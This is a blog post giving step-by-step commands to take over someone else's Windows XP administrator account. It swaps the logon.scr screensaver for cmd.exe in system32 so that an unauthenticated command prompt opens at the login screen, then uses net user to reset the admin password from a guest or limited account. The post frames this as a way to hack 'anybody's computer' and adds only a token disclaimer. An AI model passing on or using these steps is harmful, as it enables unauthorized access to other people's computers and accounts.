Hack windows XP admin password

images4.jpgWindows is the world’s most popular Operating System and there is no doubt about it. But security has always been a concern in the Windows. Every now and then you will listen or read about the hacking tricks in windows either through changes in the windows registry or through learning about some of the system files. Hackers usually try to learn the function of files stored in the system32 folder of the windows. I will be telling you about a very simple trick to hack or change the admin password of anybody’s computer. But I suggest that plz don’t use it for any mischief. Neither I will be responsible for any error that occurs while you are performing it.

If you are already into admin account then it is quite easy. Just type following commands after opening the command prompt ( Start/run type cmd and press enter to open the command prompt).

Root dir…>net user <administrator’s account name> <password you want to assign>

This will change the current password of admin to the password you assigned without asking you to enter the current password.

However if you are logged into a guest or a limited account on the system then type as follows into the command prompt:

Go to the system32 directory through your root directory.
i.e.
c:\windows\system32 >
c:\windows\system32 >mkdir hackadmin // to create the folder hackadmin
c:\windows\system32 >copy logon.scr hackadmin\logon.scr //It creates copy of logon.scr
c:\windows\system32 >copy cmd.exe hackadmin\cmd.exe //Creates backup of cmd.exe
c:\windows\system32 >del logon.scr //deletes original logon.scr
c:\windows\system32 >rename cmd.exe logon.scr // to rename cmd.exe to logon.scr
c:\windows\system32 >exit //quits command prompt

By above steps you have created a backup of the command program and the screen saver file, then edited the settings so that when the machine boots the screen saver you will see an unprotected dos prompt with out logging into XP. Then it’s all easy. You just have to follow the command as in earlier case i.e.
dir…>net user <admin acc name>password
You can get lot more hacking tricks at http://www.orkut.com/Community.aspx?cmm=24391879.

It will also not ask you the current password. So have fun and plz don’t misuse these tricks. Merry Xmas and a happy new year to all of you.

Bookmark and Share:
Find some related Blogs

  • Share/Bookmark

Leave a Reply